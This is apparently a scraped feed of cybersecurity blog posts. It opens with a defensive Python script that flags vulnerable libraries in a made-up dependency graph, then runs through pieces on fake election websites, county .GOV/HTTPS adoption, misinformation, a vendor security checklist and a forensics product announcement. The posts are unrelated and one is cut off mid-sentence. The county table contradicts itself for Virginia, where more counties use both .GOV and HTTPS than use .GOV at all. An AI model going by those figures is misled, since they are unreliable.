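# "app" is the application; every library name is made up for illustration.
DEPENDENCIES = {
    "app": ["web-framework", "json-parser", "logging-lib"],
    "web-framework": ["template-engine", "http-client", "json-parser"],
    "template-engine": ["expression-lang"],
    "http-client": ["tls-wrapper"],
    "logging-lib": ["json-parser"],
    "json-parser": [],
    "expression-lang": [],
    "tls-wrapper": [],
}

# Constructed scanner output: libraries with a known flaw.
VULNERABLE = {"json-parser", "expression-lang", "tls-wrapper"}


def shortest_paths(graph, root):
    """Breadth-first walk from the application.

    Returns {library: shortest chain of dependencies from root to it}.
    Already-visited nodes are skipped, so dependency cycles terminate.
    """
    paths = {root: [root]}
    queue = deque([root])
    while queue:
        node = queue.popleft()
        for dep in graph.get(node, []):
            if dep not in paths:
                paths[dep] = paths[node] + [dep]
                queue.append(dep)
    return paths


def classify_flaws(graph, root, vulnerable):
    """Label each reachable flawed library as direct, transitive or both."""
    paths = shortest_paths(graph, root)
    direct = set(graph.get(root, []))
    findings = {}
    for lib in sorted(vulnerable):
        if lib not in paths:
            continue  # flagged by the scanner but never pulled in by this app
        # Reachable libraries (other than the app) that declare lib themselves.
        parents = sorted(
            (p for p in paths if p not in (root, lib) and lib in graph.get(p, [])),
            key=lambda p: (len(paths[p]), p),
        )
        if lib in direct and parents:
            kind = "both"
        elif lib in direct:
            kind = "direct"
        else:
            kind = "transitive"
        findings[lib] = {
            "kind": kind,
            "depth": len(paths[lib]) - 1,  # 1 = declared by the app itself
            # Shortest chain that reaches lib through another library.
            "indirect_path": paths[parents[0]] + [lib] if parents else None,
        }
    return findings


def summarize(findings):
    """Count findings per category, matching the report's three buckets."""
    counts = {"direct": 0, "transitive": 0, "both": 0}
    for finding in findings.values():
        counts[finding["kind"]] += 1
    return counts


if __name__ == "__main__":
    results = classify_flaws(DEPENDENCIES, "app", VULNERABLE)
    for lib, finding in results.items():
        chain = " -> ".join(finding["indirect_path"] or ["app", lib])
        print(f"{lib}: {finding['kind']} (depth {finding['depth']}) via {chain}")
    print(summarize(results))
```

The "indirect_path" field shows which direct dependency has to be upgraded or replaced to remove a flaw the application never declared itself.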

Learn more

#BeCyberSmart about application security, this month and every month. To learn more, watch this short video.

Election 2020 – Fake Election Websites: Five Tips So You Don’t Get Fooled

When you spot a .GOV web domain tacked onto the end of a U.S. election website, that’s a strong sign you can turn to it for trustworthy election information. However, the overwhelming majority of local county election websites fail to use the .GOV domain.

Recent research by McAfee found that more than 80% of the 3,089 county election administration websites in the U.S. don’t use a .GOV domain. The concern behind that stat is this: the lack of .GOV domain usage could allow bad actors to create fake election websites—which could in turn spread disinformation about the election and potentially hamper your ability to cast a valid ballot.

Moreover, nearly 45% of those 3,089 sites fail to use HTTPS encryption, a security measure which can further prevent bad actors from re-directing voters to fake websites that can misinform them and potentially steal their personal information.

And it appears that a number of fake sites have cropped up already.

Let’s take a closer look at what’s happening and what you can do to protect your vote.

Why .GOV domains matter

Not anyone can get a .GOV domain. It requires buyers to submit evidence to the U.S. government that they represent a legitimate government entity, such as a local, county, or state election administrative body. Thus, .GOV sites are quite difficult to fake.

Compare that to election sites that use publicly available domains like .COM, .ORG, and .US. A bad actor could easily create fake election sites by purchasing a URL with a similar or slightly mis-typed name to the legitimate election site—a practice known as typosquatting—and use it to spread false information.

A rise in fake election sites?

Typosquatted election sites are more than a theory. Just this August, it was reported that the Federal Bureau of Investigation (FBI) and Department of Homeland Security (DHS) issued a warning bulletin to election officials that stated, “The FBI between March and June 2020 identified suspicious typosquatting of U.S. state and federal election domains, according to recent FBI reporting from a collaborative source.”

And just last week, the Feds issued another warning about the risk of fake websites exploiting the lack of .GOV in the names of election websites.

What makes this approach of mimicry and typosquatting so attractive to bad actors? Rather than clear the much more difficult hurdle of meddling with ballots and other vote-tabulating infrastructure, bad actors can take the relatively easier route of faking websites that pass along incorrect voter information, all in an effort to keep people from casting a valid vote in the first place.

Protect your vote

While we have no direct control over the use of the .GOV domain and HTTPS encryption by our local election sites, there are still steps we can take to protect our vote. Here’s what you can do:

  1. Stay informed. Check that the site you’re visiting is a .GOV website and that HTTPS security protection is in place to ensure your security. If your local site is one of the many that does not use one, the other, or both, contact your local officials to confirm any election instructions you receive. gov provides an excellent resource for this as does the U.S. Election Assistance Commission.
  2. Look out for suspicious emails. Scrutinize all election-related emails you receive. An attacker could use time-tested phishing techniques to misinform you with emails that can sometimes look strikingly legitimate. Check this blog for tips on how to spot such phishing attacks.
  3. Trust official voting literature. The U.S. Postal Service is the primary channel state and local governments use to send out voting information. Look to those printed materials for proper information. However, be sure to validate the polling information you find in them as well—such as with a visit to this list of polling places by state compiled by Vote.org.
  4. Steer clear of social media. It’s quite easy for bad actors to spread bad information by setting up phony social media groups or profiles. For more on spotting fake news in your social media feed and election misinformation, check out my recent blogs on those topics.
  5. Protect yourself and your devices. Using strong security software that protects your computers, tablets, and smartphones will help prevent phishing attacks, block links to suspicious sites, and help protect your privacy and identity. Also, disable pop-ups in your browser. Together, these will offer a line of defense against attempts to steer you toward a phony election site.

The post Election 2020 – Fake Election Websites: Five Tips So You Don’t Get Fooled appeared first on McAfee Blogs.

Cyber Security Awareness: A Critical Checklist

October 2020 marks the 17th year of National CyberSecurity Awareness Month, where users and organizations are encouraged to double their efforts to be aware of cybersecurity issues in all their digital dealings—and to take concrete steps to increase their privacy and security as necessary. The Cybersecurity & Infrastructure Security Agency (CISA), in conjunction with the National Cyber Security Alliance (NCSA) has announced a four-week security strategy under the theme “Do Your Part. #BeCyberSmart”. (You can use the NCSAM hashtag #BeCyberSmart during October to promote your involvement in raising cybersecurity awareness.) Their schedule includes the following:

 

 

  • Week of October 5 (Week 1): If You Connect It, Protect It
  • Week of October 12 (Week 2): Securing Devices at Home and Work
  • Week of October 19 (Week 3): Securing Internet-Connected Devices in Healthcare
  • Week of October 26 (Week 4): The Future of Connected Devices

Here in Trend Micro’s Consumer Division, we’d like to do our part by providing a breakdown of the security issues you should be aware of as you think about cybersecurity—and to give you some tips about what you can do to protect yourself and your family while working, learning, or gaming at home. To help, we’ve also taken a look back at articles we’ve written recently to address each category of threat—and to provide some quick links to access our library of relevant blogs all in a single place.

The range of threats

As you think about potential threats during Cybersecurity Awareness Month and beyond, keep in mind our basic breakdown of where and how threats arise, which we outlined at the beginning of the year in our Everyday Cyber Threat Landscape blog. An updated summary is given here:

Home network threats: Our homes are increasingly powered by online technologies. Over two-thirds (69%) of US households now own at least one smart home device: everything from voice assistant-powered smart speakers to home security systems and connected baby monitors. But gaps in protection can expose them to hackers. There were an estimated 105m smart home attacks in the first half of 2019 alone. With home routers particularly at risk, it’s a concern that 83% are vulnerable to attack. In the first half of 2020, Trend Micro detected over 10.6 billion suspicious connection attempts on home routers’ unavailable ports—an issue made more worrisome by recent lab-based evidence that home routers are riddled with insecurities, as the Fraunhofer Home Router Security Report 2020 shows. This means you need to take steps to mitigate your router’s weaknesses, while deploying a home network security solution to address other network insecurities and to further secure your smart devices.

Endpoint threats: These are attacks aimed squarely at you the user, usually via the email channel. Trend Micro detected and blocked more than 26 billion email threats in the first half of 2019, nearly 91% of the total number of cyber-threats. These included phishing attacks designed to trick you into clicking on a malicious link to steal your personal data and log-ins or begin a ransomware download. Or they could be designed to con you into handing over your personal details, by taking you to legit-looking but spoofed sites. Endpoint threats sometimes include social media phishing messages or even legitimate websites that have been booby-trapped with malware. All this means that installing endpoint security on your PCs and Macs is critical to your safety.

Mobile security threats: Hackers are also targeting our smartphones and tablets with greater sophistication. Malware is often unwittingly downloaded by users, since it’s hidden in normal-looking mobile apps, like the Agent Smith adware that infected over 25 million Android handsets globally in 2019. Users are also extra-exposed to social media attacks and those leveraging unsecured public Wi-Fi when using their devices. Once again, the end goal for the hackers is to make money: either by stealing your personal data and log-ins; flooding your screen with adverts; downloading ransomware; or forcing your device to contact expensive premium rate phone numbers that they own. The conclusion? Installing a mobile security solution, as well as a personal VPN, on your Android or iOS device should be part of your everyday security defense.

Identity data breaches are everywhere: The raw materials needed to unlock your online accounts and help scammers commit identity theft and fraud are stored by the organizations you interact with online. Unfortunately, these companies continued to be targeted by data thieves in 2019. As of November 2019, there were over 1,200 recorded breaches in the US, exposing more than 163 million customer records. Even worse, hackers are now stealing card data direct from the websites you shop with as it is entered, via “digital skimming” malware. That said, an increasingly popular method uses automated tools that try tens of thousands of previously breached log-ins to see if any of them work on your accounts. From November 2017 through the end of March 2019, over 55 billion such attacks were detected. Add these to the classical phishing attack, where email hoaxes are designed to get you to unwittingly hand over your data, and your data and identity can be severely compromised. In this category, using both a password manager and an identity security monitoring solution is critical for keeping your identity data safe as you access your online accounts.

How Trend Micro can help

Trend Micro fully understands these multiple sources for modern threats, so it offers a comprehensive range of security products to protect all aspects of your digital life—from your smart home network to your PCs and Macs, and from your mobile devices to your online accounts. We also know you need security for your email and your social networks, or simply when browsing the web itself.

Trend Micro Home Network Security: Provides protection against network intrusions, router hacks, web threats, dangerous file downloads and identity theft for every device connected to the home network.

Trend Micro Premium Security Suite: Our new premium offering provides all of the products listed below for up to 10 devices, plus Premium Services by our highly trained pros. It includes 24×7 technical support, virus and spyware removal, a PC security health check, and remote diagnosis and repair. As always, however, each solution below can be purchased separately, as suits your needs.

  • Trend Micro Security: Protects your PCs and Macs against web threats, phishing, social network threats, data theft, online banking threats, digital skimmers, ransomware and other malware. Also guards against over-sharing on social media.
  • Trend Micro Mobile Security: Protects against malicious app downloads, ransomware, dangerous websites, and unsafe Wi-Fi networks.
  • Trend Micro Password Manager: Provides a secure place to store, manage and update your passwords. It remembers your log-ins, enabling you to create long, secure and unique credentials for each site/app you need to sign-in to.
  • Trend Micro WiFi Protection: Protects you on unsecured public WiFi by providing a virtual private network (VPN) that encrypts your traffic and ensures protection against man-in-the-middle (MITM) attacks.
  • Trend Micro ID Security (Android, iOS): Monitors underground cybercrime sites to securely check if your personal information is being traded by hackers on the Dark Web and sends you immediate alerts if so, so you can take steps to address the problem.

The post Cyber Security Awareness: A Critical Checklist appeared first on .

NIST Cybersecurity Expert Donna Dodson Receives Service to America Medal

Donna Dodson, a cybersecurity expert who worked for her entire 33-year career at the National Institute of Standards and Technology (NIST), has been honored this week with a Samuel J. Heyman Service to America Medal for her numerous contributions to the field. Since 2002, the Partnership for Public Service has awarded “Sammies” medals to honor outstanding civil servants. One of just 11 winners chosen from a pool of more than 350 nominations, Dodson received her medal in the Safety, Security and International Affairs category. “Donna Dodson demonstrates the profound impact that a single

ZecOps for Mobile DFIR 2.0 – Now Supporting iOS *AND* Android

ZecOps is excited to announce the release of ZecOps for Mobile 2.0, which includes full support for Android. With this release, ZecOps has extended its best-in-class automatic digital forensics capabilities to the two most widespread and important mobile operating systems in the world, iOS and Android.

We see it in the news everyday: sophisticated threat actors can bypass all existing security defenses. These mistakes lead to sudden reboots, crashes, appearances in logs / OS telemetry, bugs, errors, battery loss, and other “unexplained” anomalies. ZecOps for Mobile analyzes the associated events against databases of attack techniques, common weaknesses (CWEs), and common vulnerabilities (CVEs). ZecOps’s core technology utilizes machine learning for insights, correlation and identifying anomalous behavior for 0-day attacks. Following a quick investigation, ZecOps produces a detailed assessment of if, when, and how a mobile device has been compromised.

World-leading governments, defense agencies, enterprises, and VIPs rely on ZecOps to automate their advanced investigations, greatly improving their threat intelligence, threat detection, APT hunting, and risk & compromise assessment capabilities. With support for Android, ZecOps can now extend this threat intelligence across an entire organization’s mobile footprint.

Supported versions:

  • Android 8 and above – until latest
  • iOS 10 and above – until latest

Supported HW Models:

  • All device models are supported on both Android and iOS.

ZecOps provides the most thorough operating system telemetry analysis as part of its advanced digital forensics. By focusing on the trails that hackers leave (“Attackers’ Mistakes”), ZecOps can provide sophisticated security organizations with critical information on the attackers’ tools, advanced persistent threats, and even discovery of attacks leveraging zero-day vulnerabilities.

Election 2020 – Keep Misinformation from Undermining the Vote

On September 22nd, the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) issued an advisory about the potential threat from foreign actors and cybercriminals attempting to spread false information. Their joint public service announcement makes a direct statement regarding how this could affect our election:

“Foreign actors and cybercriminals could create new websites, change existing websites, and create or share corresponding social media content to spread false information in an attempt to discredit the electoral process and undermine confidence in U.S. democratic institutions.”

Their call to action is clear—critically evaluate the content you consume and seek out reliable and verified information from trusted sources, such as state and local election officials. Not just leading up to Election Day, but during and after as well.

Here’s why: it’s estimated that roughly 75% of American voters will be eligible to vote by mail, potentially leading to some 80 million mail-in ballots being cast. That’s twice the number from the 2016 presidential election, which could prolong the normal certification process. Election results will likely take days, even weeks, to ensure every legally cast ballot is counted accurately so that the election results can ultimately get certified.

That extended stretch of time is where the concerns come in. Per the FBI and CISA:

“Foreign actors and cybercriminals could exploit the time required to certify and announce elections’ results by disseminating disinformation that includes reports of voter suppression, cyberattacks targeting election infrastructure, voter or ballot fraud, and other problems intended to convince the public of the elections’ illegitimacy.”

In short, bad actors may attempt to undermine people’s confidence in our election as the results come in.

Our moment to act as smart consumers, and sharers, of online news has never been more immediate.

Misinformation flies quicker, and farther, than the truth

Before we look at how we can combat the spread of false information this election, let’s see how it cascades across the internet.

It’s been found that false political news traveled deeper and more broadly, reached more people, and was more viral than any other category of false information, according to a Massachusetts Institute of Technology study on the spread of true and false news online, which was published by Science in 2018.

Why’s that so? In a word: people. According to the research findings,

“We found that false news was more novel than true news, which suggests that people were more likely to share novel information … Contrary to conventional wisdom, robots accelerated the spread of true and false news at the same rate, implying that false news spreads more than the truth because humans, not robots, are more likely to spread it.”

Thus, bad actors pick their topics, pump false information about them into social media channels, and then let people spread it by way of shares, retweets, and the like—thanks to “novel” and click-baity headlines for content people may not even read or watch, let alone fact check.

Done on a large scale, false information thus can hit millions of feeds, which is what the FBI and CISA are warning us about.

Five ways you can combat the spread of false information this election

The FBI and CISA recommend the following:

  1. Seek out information from trustworthy sources, such as state and local election officials; verify who produced the content; and consider their intent.
  2. Verify through multiple reliable sources any reports about problems in voting or election results and consider searching for other reliable sources before sharing such information via social media or other avenues.
  3. For information about final election results, rely on state and local government election officials.
  4. Report potential election crimes—such as disinformation about the manner, time, or place of voting—to the FBI.
  5. If appropriate, make use of in-platform tools offered by social media companies for reporting suspicious posts that appear to be spreading false or inconsistent information about election-related problems or results.

Stick to trustworthy sources

If there’s a common theme across our election blogs so far, it’s trustworthiness.

Knowing which sources are deserving of our trust and being able to spot the ones that are not takes effort—such as fact-checking from reputable sources like FactCheck.org, the Associated Press, and Reuters or researching the publisher of the content in question to review their credentials. Yet that effort is worthwhile, even necessary today. The resources listed in my recent blogs can help:

The post Election 2020 – Keep Misinformation from Undermining the Vote appeared first on McAfee Blogs.

US County Election Websites (Still) Fail to Fulfill Basic Security Measures

Elections 2020

In January 2020, McAfee released the results of a survey establishing the extent of the use of .GOV validation and HTTPS encryption among county government websites in 13 states projected to be critical in the 2020 U.S. Presidential Election. The research was a result of my concern that the lack of .GOV and HTTPS among county government websites and election-specific websites could allow foreign or domestic malicious actors to potentially create fake websites and use them to spread disinformation in the final weeks and days leading up to Election Day 2020.

Subsequently, reports emerged in August that the U.S. Federal Bureau of Investigation, between March and June, had identified dozens of suspicious websites made to look like official U.S. state and federal election domains, some of them referencing voting in states like Pennsylvania, Georgia, Tennessee, Florida and others.

Just last week, the FBI and Department of Homeland Security released another warning about fake websites taking advantage of the lack of .GOV on election websites.

These revelations compelled us to conduct a follow-up survey of county election websites in all 50 U.S. states.

Why .GOV and HTTPS Matter

Using a .GOV web domain reinforces the legitimacy of the site. Government entities that purchase .GOV web domains have submitted evidence to the U.S. government that they truly are the legitimate local, county, or state governments they claimed to be. Websites using .COM, .NET, .ORG, and .US domain names can be purchased without such validation, meaning that there is no governing authority preventing malicious parties from using these names to set up and promote any number of fraudulent web domains mimicking legitimate county government domains.

An adversary could use fake election websites for disinformation and voter suppression by targeting specific citizens in swing states with misleading information on candidates or inaccurate information on the voting process such as poll location and times. In this way, a malicious actor could impact election results without ever physically or digitally interacting with voting machines or systems.

The HTTPS encryption measure assures citizens that any voter registration information shared with the site is encrypted, providing greater confidence in the entity with which they are sharing that information. Websites lacking the combination of .GOV and HTTPS cannot provide 100% assurance that voters seeking election information are visiting legitimate county and county election websites. This leaves an opening for malicious actors to steal information or set up disinformation schemes.

I recently demonstrated how such a fake website would be created by mimicking a genuine county election website and then inserting misleading information that could influence voter behavior. This was done in an isolated lab environment that was not accessible to the internet, so as not to create any confusion for legitimate voters.

In many cases, election websites have been set up to provide a strong user experience versus a focus on mitigating concerns that they could be spoofed to exploit the communities they serve. Malicious actors can pass off fake election websites and mislead large numbers of voters before detection by government organizations. A campaign close to election day could confuse voters and prevent votes from being cast, resulting in missing votes or overall loss of confidence in the democratic system.

September 2020 Survey Findings

McAfee’s September survey of county election administration websites in all 50 U.S. states (3089 counties) found that 80.2% of election administration websites or webpages lack the .GOV validation that confirms they are the websites they claim to be.

Nearly 45% of election administration websites or webpages lack the necessary HTTPS encryption to prevent third-parties from re-directing voters to fake websites or stealing voters’ personal information.

Only 16.4% of U.S. county election websites implement U.S. government .GOV validation and HTTPS encryption.

| State | # Counties | # .GOV | % .GOV | # HTTPS | % HTTPS | # BOTH | % BOTH |
|---|---|---|---|---|---|---|---|
| Alabama | 67 | 8 | 11.9% | 26 | 38.8% | 6 | 9.0% |
| Alaska | 18 | 1 | 5.6% | 12 | 66.7% | 1 | 5.6% |
| Arizona | 15 | 11 | 73.3% | 14 | 93.3% | 11 | 73.3% |
| Arkansas | 75 | 18 | 24.0% | 30 | 40.0% | 17 | 22.7% |
| California | 58 | 8 | 13.8% | 45 | 77.6% | 6 | 10.3% |
| Colorado | 64 | 21 | 32.8% | 49 | 76.6% | 20 | 31.3% |
| Connecticut | 8 | 1 | 12.5% | 2 | 25.0% | 1 | 12.5% |
| Delaware | 3 | 0 | 0.0% | 0 | 0.0% | 0 | 0.0% |
| Florida | 67 | 4 | 6.0% | 64 | 95.5% | 4 | 6.0% |
| Georgia | 159 | 40 | 25.2% | 107 | 67.3% | 35 | 22.0% |
| Hawaii | 5 | 4 | 80.0% | 4 | 80.0% | 4 | 80.0% |
| Idaho | 44 | 6 | 13.6% | 28 | 63.6% | 5 | 11.4% |
| Illinois | 102 | 14 | 13.7% | 60 | 58.8% | 12 | 11.8% |
| Indiana | 92 | 28 | 30.4% | 41 | 44.6% | 16 | 17.4% |
| Iowa | 99 | 27 | 27.3% | 80 | 80.8% | 25 | 25.3% |
| Kansas | 105 | 8 | 7.6% | 46 | 43.8% | 2 | 1.9% |
| Kentucky | 120 | 19 | 15.8% | 28 | 23.3% | 15 | 12.5% |
| Louisiana | 64 | 5 | 7.8% | 12 | 18.8% | 2 | 3.1% |
| Maine | 16 | 0 | 0.0% | 0 | 0.0% | 0 | 0.0% |
| Maryland | 23 | 9 | 39.1% | 22 | 95.7% | 8 | 34.8% |
| Massachusetts | 14 | 3 | 21.4% | 5 | 35.7% | 2 | 14.3% |
| Michigan | 83 | 9 | 10.8% | 63 | 75.9% | 9 | 10.8% |
| Minnesota | 87 | 5 | 5.7% | 59 | 67.8% | 5 | 5.7% |
| Mississippi | 82 | 8 | 9.8% | 30 | 36.6% | 5 | 6.1% |
| Missouri | 114 | 8 | 7.0% | 49 | 43.0% | 7 | 6.1% |
| Montana | 56 | 15 | 26.8% | 21 | 37.5% | 8 | 14.3% |
| Nebraska | 93 | 35 | 37.6% | 73 | 78.5% | 32 | 34.4% |
| Nevada | 16 | 3 | 18.8% | 13 | 81.3% | 2 | 12.5% |
| New Hampshire | 10 | 0 | 0.0% | 0 | 0.0% | 0 | 0.0% |
| New Jersey | 21 | 3 | 14.3% | 11 | 52.4% | 2 | 9.5% |
| New Mexico | 33 | 7 | 21.2% | 20 | 60.6% | 6 | 18.2% |
| New York | 62 | 15 | 24.2% | 48 | 77.4% | 14 | 22.6% |
| North Carolina | 100 | 37 | 37.0% | 69 | 69.0% | 29 | 29.0% |
| North Dakota | 53 | 3 | 5.7% | 19 | 35.8% | 2 | 3.8% |
| Ohio | 88 | 77 | 87.5% | 88 | 100.0% | 77 | 87.5% |
| Oklahoma | 77 | 1 | 1.3% | 24 | 31.2% | 1 | 1.3% |
| Oregon | 36 | 1 | 2.8% | 22 | 61.1% | 0 | 0.0% |
| Pennsylvania | 67 | 11 | 16.4% | 40 | 59.7% | 7 | 10.4% |
| Rhode Island | 5 | 2 | 40.0% | 3 | 60.0% | 0 | 0.0% |
| South Carolina | 46 | 15 | 32.6% | 33 | 71.7% | 13 | 28.3% |
| South Dakota | 66 | 2 | 3.0% | 14 | 21.2% | 1 | 1.5% |
| Tennessee | 95 | 23 | 24.2% | 38 | 40.0% | 12 | 12.6% |
| Texas | 254 | 10 | 3.9% | 86 | 33.9% | 6 | 2.4% |
| Utah | 29 | 8 | 27.6% | 16 | 55.2% | 7 | 24.1% |
| Vermont | 14 | 0 | 0.0% | 0 | 0.0% | 0 | 0.0% |
| Virginia | 95 | 33 | 34.7% | 61 | 64.2% | 35 | 36.8% |
| Washington | 39 | 7 | 17.9% | 26 | 66.7% | 6 | 15.4% |
| West Virginia | 55 | 18 | 32.7% | 33 | 60.0% | 16 | 29.1% |
| Wisconsin | 72 | 16 | 22.2% | 61 | 84.7% | 11 | 15.3% |
| Wyoming | 23 | 4 | 17.4% | 15 | 65.2% | 2 | 8.7% |
| Total | 3089 | 611 | 19.8% | 1710 | 55.4% | 507 | 16.4% |

We found that the battleground states were largely in a bad position when it came to .GOV and HTTPS.

Only 29% of election websites used both .GOV and HTTPS in North Carolina, 22% in Georgia, 15.3% in Wisconsin, 10.8% in Michigan, 10.4% in Pennsylvania, and 2.4% in Texas.

While 95.5% of Florida’s county election websites and webpages use HTTPS encryption, only 6% validate their authenticity with .GOV.

During the January 2020 survey, only 11 Iowa counties protected their election administration pages and domains with .GOV validation and HTTPS encryption. By September 2020, that number rose to 25 as 14 counties added .GOV validation. But 72.7% of the state’s county election sites and pages still lack official U.S. government validation of their authenticity.

By contrast, Ohio led the survey pool with 87.5% of election webpages and domains validated by .GOV and protected by HTTPS encryption. Four of five (80%) Hawaii counties protect their main county and election webpages with both .GOV validation and encryption, and 73.3% of Arizona county election websites do the same.

What’s not working

Separate Election Sites. As many as 166 counties set up websites that were completely separate from their main county web domain.  Separate election sites may have easy-to-remember, user-friendly domain names to make them more accessible for the broadest possible audience of citizens. Examples include my own county’s www.votedenton.com as well as www.votestanlycounty.com, www.carrollcountyohioelections.gov, www.voteseminole.org, and www.worthelections.com.

The problem with these election-specific domains is that while 89.1% of these sites have HTTPS, 92.2% lack .GOV validation to guarantee that they belong to the county governments they claim. Furthermore, only 7.2% of these domains have both .GOV and HTTPS implemented. This suggests that malicious parties could easily set up numerous websites with similarly named domains to spoof these legitimate sites.

Not on OUR website. Some smaller counties with few resources often reason that they can inform and protect voters simply by linking from their county websites to their states’ official election sites. Other smaller counties have suggested that social media platforms such as Facebook are preferable to election websites to reach Internet-savvy voters.

Unfortunately, neither of these approaches prevents malicious actors from spoofing their county government web properties. Such actors could still set up fake websites regardless of whether the genuine websites link to a .GOV validated state election website or whether counties set up amazing Facebook election pages.

For that matter, Facebook is not a government entity focused on validating that organizational or group pages are owned by the entities they claim to be. The platform could just as easily be used by malicious parties to create fake pages spreading disinformation about where and how to vote during elections.

It’s not OUR job. McAfee found that some states’ voters could be susceptible to fake county election websites even though their counties have little if any role at all in administering elections. States such as Connecticut, Delaware, Maine, Massachusetts, New Hampshire, Rhode Island and Vermont administer their elections through their local governments, meaning that any election information is only available at the states’ websites and those websites belonging to major cities and towns. While this arrangement makes county-level website comparisons with other states difficult for the purpose of our survey, it doesn’t make voters in these states any less susceptible to fake versions of their county website.

There should be one recipe for the security and integrity of government websites such as election websites and that recipe should be .GOV and HTTPS.

What IS working: The Carrot & The Stick

Ohio’s leadership position in our survey appears to be the result of a state-led initiative to transition county election-related content to .GOV validated web properties. Ohio’s Secretary of State used “the stick” approach by demanding by official order that counties implement .GOV and HTTPS on their election web properties. If counties couldn’t move their existing websites to .GOV, he offered “the carrot” of allowing them to leverage the state’s domain.

A majority of counties have subsequently transitioned their main county websites to .GOV domains, their election-specific websites to .GOV domains, or their election-specific webpages to Ohio’s own .GOV-validated https://ohio.gov/ domain.

Examples:

https://adamscountyoh.gov/elections.asp
https://www.allen.boe.ohio.gov/
https://boe.ashland.oh.gov/
https://www.boe.ohio.gov/ashtabula
https://elections.bcohio.gov/
https://www.carrollcountyohioelections.gov/
https://boe.clermontcountyohio.gov/
https://crawfordcountyohioboe.gov/
https://vote.delawarecountyohio.gov/
https://votehamiltoncountyohio.gov/

While Ohio’s main county websites still largely lack .GOV validation, Ohio does provide a mechanism for voters to quickly assess if the main election website is real or potentially fake. Other states should consider such interim strategies until all county and local websites with election functions can be fully transitioned to .GOV.

Ultimately, the end goal should be that we are able to tell voters that if they don’t see .GOV and HTTPS, they shouldn’t believe that a website is legitimate or safe. What we tell voters must be that simple, because the general public lacks the technical background to tell real sites from fake sites.

For more information on our .GOV-HTTPS county website research, potential disinformation campaigns, other threats to our elections, and voter safety tips, please visit our Elections 2020 page: https://www.mcafee.com/enterprise/en-us/2020-elections.html

The post US County Election Websites (Still) Fail to Fulfill Basic Security Measures appeared first on McAfee Blogs.

Spot Fake News and Misinformation in Your Social Media Feed


Where do you get your news? There’s a good chance much of it comes from social media.

In 2019, Pew Research found that 55% of American adults said they get their news from social media either “often” or “sometimes,” which is an 8% rise over the previous year. We can visualize what that mix might look like. Some of their news on social media may come from information sources they’ve subscribed to and yet more news may appear via articles reposted or retweeted by friends.

So, as we scroll through our feeds and quickly find ourselves awash in a cascade of news and comments on the news, we also find ourselves wondering: what’s true and false here?

And that’s the right question to ask. With the advent of the internet, anyone can become a publisher. That’s one of the internet’s greatest strengths—we can all have a voice. Publishing is no longer limited to newspaper, TV, and radio ownership bodies. Yet it’s one of the internet’s greatest challenges as well—with millions of publishers out there, not everyone is posting the truth. And sometimes, people aren’t doing the posting at all.

For example, last May, researchers at Carnegie Mellon University studied more than 200 million tweets about the current virus. Of the top 50 most influential retweeters, 82% of them were bots. Some 62% of the top 1,000 retweeters were bots as well. What were they retweeting? Researchers said the tweets revolved around more than 100 types of inaccurate stories that included unfounded conspiracy theories and phony cures. Researchers cited two reasons for this surge: “First, more individuals have time on their hands to create do-it-yourself bots. But the number of sophisticated groups that hire firms to run bot accounts also has increased.”

With the sheer volume of news and information we wade through each day, you can be assured that degrees of false and misleading information make their way into people’s social media mix. And that calls for all of us to build up our media literacy—which is our ability to critically analyze the media we consume for bias and accuracy.

What follows are a few basics of media literacy that can help you to discern what’s fact and what’s fiction as you scroll through your social media feed for news.

The difference between misinformation and disinformation

When talking about spotting truth from falsehood on social media, it helps to first define two types of falsehood: the unintentional and the deliberate.

First off, there’s unintentional misinformation. We’re only human, and sometimes that means we get things wrong. We forget details, recall things incorrectly, or we pass along unverified accounts that we mistakenly take for fact. Thus, misinformation is wrong information that you don’t know is wrong. An innocent everyday example of this is when someone on your neighborhood Facebook group posts that the drug store closes at 8pm on weeknights when in fact it really closes at 7pm. They believe it closes at 8pm, but they’re simply mistaken.

That differs entirely from deliberate disinformation. This is intentionally misleading information or facts that have been manipulated to create a false narrative—typically with an ulterior motive in mind. The readiest example of this is propaganda, yet other examples also extend to deliberate untruths engineered to discredit a person, group, or institution. In other words, disinformation can take forms both large and small. It can apply to a person just as easily as it can to a major news story.

Now, let’s take a look at some habits and tactics designed to help you get a better grasp on the truth in your social media feed.

Consider the source

Some of the oldest advice is the best advice, and that holds true here: consider the source. Take time to examine the information you come across. Look at its source. Does that source have a track record of honesty and dealing plainly with the facts? Likewise, that source has sources too. Consider them in the same way as well.

Now, what’s the best way to go about that? For one, social media platforms are starting to embed information about publications into posts where their content is shared. For example, if a friend shares an article from The Economist, Facebook now includes a small link in the form of an “i” in a circle. Clicking on this presents information about the publication, which can give you a quick overview of its ownership, when it was founded, and so forth.

Another fact-finding trick comes by way of Michael Caulfield, the Director of Blended and Networked Learning at Washington State University. He calls it: “Just Add Wikipedia.” It entails doing a search for a Wikipedia page by using the URL of an information source. For example, if you saw an article published on Vox.com, you’d simply search “Wikipedia www.vox.com.” The Wikipedia entry will give you an overview of the information source, its track record, its ownership, and if it has fired reporters or staff for false reporting. Of course, be aware that Wikipedia entries are written by public editors and contributors. These articles will only be as accurate as the source material that they are drawn from, so be sure to reference the footnotes that are cited in the entry. Reading those will let you know if the entry is informed by facts from reputable sources. They may open up other avenues of fact-finding as well!

Expand your media diet

A single information source or story won’t provide a complete picture. It may only cover a topic from a certain angle or narrow focus. Likewise, information sources are helmed by editors and stories are written by people—all of whom have their biases, whether overt or subtle. It’s for this reason that expanding your media diet to include a broader range of information sources is so important.

So, see what other information sources have to say on the same topic. Consuming news across a spectrum will expose you to thoughts and coverage you might not otherwise get if you keep your consumption to a handful of sources. The result is that you’re more broadly informed and have the ability to compare and contrast different sources and points of view. Using the tips above, you can find other reputable sources to round out your media diet.

Additionally, for a list of reputable information sources, along with the reasons why they’re reputable, check out “10 Journalism Brands Where You Find Real Facts Rather Than Alternative Facts” published by Forbes and authored by an associate professor at The King’s College in New York City. It certainly isn’t the end all, be all of lists, yet it should provide you with a good starting point.

Let your emotions be your guide

Has a news story you’ve read or watched ever made you shake your fist at the screen or want to clap and cheer? How about something that made you fearful or simply laugh? Bits of content that evoke strong emotional responses tend to spread quickly, whether they’re articles, a post, or even a tweet. That’s a ready sign that a quick fact check could be in order.

